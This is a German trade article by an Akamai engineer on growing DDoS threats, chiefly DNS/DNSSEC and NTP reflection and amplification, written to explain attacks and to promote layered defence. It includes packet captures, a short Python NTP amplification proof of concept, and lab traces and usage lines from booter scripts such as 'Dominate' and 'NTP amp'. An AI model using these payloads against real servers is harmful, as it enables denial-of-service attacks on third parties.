Startseite > Security > Problemfall DDoS

Rekordhoch bei raffinierten Cyberangriffen

Problemfall DDoS

4. Oktober 2016, 8:00 Uhr | Von Gerhard Giese.

Die Zahl der DDoS-Angriffe (Distributed Denial of Service) wie auch der Angriffe auf Web-Anwendungen steigt kontinuierlich. Die dabei eingesetzten Tools und Methoden werden ständig weiter verfeinert. Bei einem Großteil kommen mittlerweile Reflection-basierte Verfahren zum Einsatz. Wirksame Abwehrmaßnahmen setzen detaillierte Kenntnisse der Funktionsweise voraus.

Die Sicherheitslage im Internet bleibt prekär. Insbesondere bei den DDoS-Angriffen ist eine erhebliche Zunahme zu verzeichnen. Eine der Ursachen dafür: Es war noch nie so einfach, einen erfolgreichen DDoS-Angriff durchzuführen. Im Internet gibt es frei verfügbare DDoS-Toolkits oder Mietlösungen, mit denen selbst technisch wenig versierte Anwender komplexe DDoS-Attacken umsetzen können. Bei einer DDoS-Mietlösung zum Beispiel stellen die Betreiber von Bot-Netzen gegen ein Entgelt, das von der Dauer und der Intensität des Angriffs abhängt, ihre Infrastruktur zur Verfügung.

Im ersten Quartal 2016 nahm die Zahl der Angriffe auf Web-Anwendungen im Vergleich zum Vorquartal um rund 26 Prozent und die Zahl der DDoS-Attacken um zirka 22 Prozent zu, so der letzte "State of the Internet Security Report" von Akamai [1]. Gemessen am ersten Quartal 2015 war bei DDoS-Angriffen gar ein Anstieg um 125 Prozent zu verzeichnen. Der größte DDoS-Angriff im ersten Quartal 2016 erreichte einen Spitzenwert von 289 GBit/s (mit 289 Millionen Paketen pro Sekunde).

Der Security Report berücksichtigt insgesamt 24 DDoS-Angriffsvektoren. Seit einiger Zeit bereits nutzt der Großteil der DDoS-Angriffe Stresser- und Booter-basierte Tools und Reflection-Verfahren. Diese Tools verstärken ihre Angriffe mithilfe von Servern, auf denen Diensten wie DNS (Domain Name System), Chargen (Character Generator Protocol) und NTP (Network Time Protocol) laufen. Bei nahezu 70 Prozent der DDoS-Angriffe im ersten Quartal 2016 kamen die Reflection-basierten Angriffsvektoren UDP (User Datagram Protocol) Fragment, DNS, Chargen und NTP zum Einsatz.

Vereinfacht ausgedrückt wird bei einer Reflection-Attacke das Zielsystem nicht direkt angegriffen, sondern es werden dazu Dienste wie DNS oder das NTP missbraucht. Der Angreifer sendet dabei zunächst kleine Mengen von Datenpaketen an die zwischengeschalteten Server, dann finden diese als Verstärker Verwendung: Sie spiegeln die Anfragen und leiten sie vielfach gesteigert an das eigentliche Angriffsziel weiter. Die folgenden Beispiele liefern einen groben Einblick in die Abläufe eines Reflection-basierten Angriffs.

Seit nahezu einem Jahr hat Akamai DDoS-Angriffe abgewehrt, bei denen eine mit DNSSec (Domain Name System Security Extensions) konfigurierte Domain missbraucht wurde [2]. Bei diesen DNS-Reflection- und Amplification-Angriffen antworteten die zwischengeschalteten Server mit mehr Traffic, als sie empfingen. Darüber hinaus muss der Angreifer bei einer Reflection-basierten Attacke noch nicht einmal die Kontrolle über den Server erlangen.

DDoS-Reflection-Angriffe mit DNSSec

Im vorliegenden Fall macht sich die Domain bestimmte Anforderungen von DNSSec zunutze. Mit den Protokollerweiterungen, die eigentlich für mehr Sicherheit sorgen sollen, werden die Name-Server als Verstärkungssysteme für Angreifer attraktiv, da man mit ihnen große Antwortpakete auslösen kann.

Die folgenden Zeilen enthalten einen DNS Query Request und die Antwort der Domain:

// malicious DNS query

16:48:58.691108 IP (tos 0x0, ttl 247, id 22126, offset 0, flags [none], proto UDP (17), length 65)

x.x.x.x.52964 > x.x.x.x .53: 18344+ [1au] ANY? Xxx .gov . (37)

// response split into one full packet and 2 fragments

23:08:46.213890 IP (tos 0x0, ttl 52, id 36095, offset 0, flags [+], proto UDP (17), length 1500)

x.x.x.x.53 > x.x.x.x.4444: 36412| 20/0/1 xxx .gov . RRSIG, xxx.gov. RRSIG, xxx.gov. MX xxx.xxx.gov. 5, xxx.xxx.gov . MX

xxx.xxx.gov . 5, xxx.gov . RRSIG, xxx.gov. TXT "v=spf1 ip4:63.74.109.6 ip4:63.74.109.10 ip4:63.74.109.20 mx a:list. xxx.gov -all",

xxx.gov. RRSIG, xxx.gov . A 63.74.109.2, xxx.gov. RRSIG[|domain]

23:08:46.213915 IP (tos 0x0, ttl 52, id 36095, offset 1480, flags [+], proto UDP (17), length 1500)

x.x.x.x > x.x.x.x: ip-proto-17

23:08:46.213941 IP (tos 0x0, ttl 52, id 36095, offset 2960, flags [none], proto UDP (17), length 1139)

x.x.x.x > x.x.x.x: ip-proto-17Bei diesem Skript ergibt sich ein Reflection-Verhältnis von etwa 1:8 (Request zu Response). Das folgende Python-Skript vervielfacht die Request Payload:

##NTP POC Amplication

## PLXsert

### Based on UDP example http://pleac.sourceforge.net/pleac_python/sockets.html

import socket

# Set up a UDP socket

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

# send

#17 00 03 2a

MSG = str('\x17\x00\x03\x2a') + str('\x00')*4

HOSTNAME = '10.1.10.128'

PORTNO = 123

s.connect((HOSTNAME, PORTNO))

if len(MSG) != s.send(MSG):

# where to get error message "$!".

print "cannot send to %s(%d):" % (HOSTNAME,PORTNO)

raise SystemExit(1)

MAXLEN = 4098

(data,addr) = s.recvfrom(MAXLEN)

s.close()

print '%s(%d) said "%s"' % (addr[0],addr[1], data)Bei einer Request-Größe von 60 Byte ergibt sich eine Response von 2.064 Byte und ein Reflection-Multiplikator von 43,4.

Häufig werden DNS-Reflection-Angriffe mit anderen Vektoren kombiniert. Zudem nutzen einige Angriffe im Markt der DDoS-Mietlösungen sehr ähnliche Skripte, beispielsweise das "amp 1.x", das "NTP amp" und das "Dominate TCP attack script". Bei den beiden ersten handelt es sich um gängige DDoS-Reflection- und Amplification-Vektoren. Das "Dominate TCP attack script" ist eine modifizierte Version des "Enhanced SYN (ESSYN) attack script". Alle drei sind im Internet verfügbar und kommen vor allem als kostengünstiger Einstieg in DDoS-Angriffe zum Einsatz. Die folgenden Zeilen enthalten Beispiele für Angriffe aus einer Testumgebung:

/Dominate TCP attack script lab simulation 23:05:58.522874 I P 230.213.47.233.21304 > 10.0.20.8.80: Flags [SEW], seq 943587328, win 0, length 0 /DNS Amp attack script v1.1 lab simulation 11:17:11.564998 IP (tos 0x0, ttl 64, id 45361, offset 0, flags [+], proto UDP (17), length 1500) 192.168.20.16.53 > 192.168.2 0.51.51942: 61769| 251/0/1 test.com. TXT "Jvvcxjoijcxoivjoixcjiojdiw9jd9wj9jf 9w9wj9", test.com. A 192.168.50.75, test.com. A 192.168.50.76, test.com. A , test.com. A 192.168.50.161[|domain] /NTP Amp attack script lab simulation 13:37:49.430166 IP 192 .168.200.128.123 > 192.168.200.129.444: NTPv2, Reserved, length 440

Ebenso wie andere Skripte, die ähnlich vorgehen, verschleiert das "Dominate TCP attack script" die IP-Quelladresse. Dominate ist zudem berüchtigt dafür, dass es einen zufälligen Mix aus allen TCP-Flags verwendet - eine Methode, mit der einige DDoS-Schutzmechanismen umgangen werden können.

Flags: 0x0c2 (SYN, ECN, CWR) 000. .... .. = Reserved: Not set ...0 .... .... = Nonce: Not set .... 1... .... = Congestion Window Reduced (CWR): Set .... .1.. .... = ECN-Echo: Set .... ..0. .... = Urgent: Not set .... ...0 .... = Acknowledgment: Not set .... .... 0... = Push: Not set .... .... .0.. = Reset: Not set .... .... ..1. = Syn: Se

Haben die Reflection-Angriffe ihr Ziel erreicht, scheint es auf den ersten Blick so, als ob die Angriffe von den DNS- und NTP-IP-Quelladressen kämen. Da die DNS- und NTP-Reflection-Attacken für ihre Aktivitäten DNS-Resolver und NTP-Server nutzen, die davon nichts merken, sind die eigentlichen Akteure kaum dingfest zu machen. Mit Ausnahme von "NTP amp" verwenden die meisten Skripte einen sehr ähnlichen Programmcode. Als eines der ersten Skripte war dieses ursprünglich in Perl verfügbar und ist heute auch in C erhältlich; das gleiche gilt für TCP-basierte Angriffe. Im folgenden Beispiel setzt der Angreifer DNS und NTP als Reflektoren ein:

DNS Flooder v1.3 Usage: ./dnsr13 > Reflection File Format: [space/tab][space/tab][space/tab]... NTP Amp DOS attack (python version) #usage ntpdos.py ex: ntpdos.py 1.2.3.4 file.txt 10 Dominate attack Usage: ./dominate

Reflection-Angriffe sind dann besonders intensiv, wenn sie drei Merkmale aufweisen: Sie erfolgen erstens als verteilter Angriff, werden zweitens durch Amplification-Techniken verstärkt und nutzen drittens Bot-Netze als zusätzlichen Hebel.

Fazit

Da sich Art, Form und Intensität von DDoS-Angriffen wie auch von Angriffen auf Web-Anwendungen ständig ändern, ist es wichtig, dass Unternehmen ihre IT-Sicherheitsmaßnahmen detailliert planen, umsetzen und ständig überprüfen. Ein effizienter Schutz umfasst mehrstufige Sicherheitsvorkehrungen, die traditionelle On-Premise-Firewalls um einen Cloud-basierten Schutzwall ergänzen. So können Unternehmen flexibel und skalierbar auf großvolumige Angriffe reagieren und sie abwehren.

Quellen

[1] Akamai, "State of the Internet Security Q1 2016 Report", verfügbar unter www.akamai.com/us/en/our-thinking/state-of-the-internet-report/global-state-of-the-internet-security-ddos-attack-reports.jsp.

[2] Security Bulletin "DNSSec Amplification" vom 16. Februar 2016, www.akamai.com/uk/en/multimedia/documents/state-of-the-internet/dnssec-amplification-ddos-security-bulletin.pdf

Gerhard Giese ist Senior Solutions Engineer bei Akamai (www.akamai.com).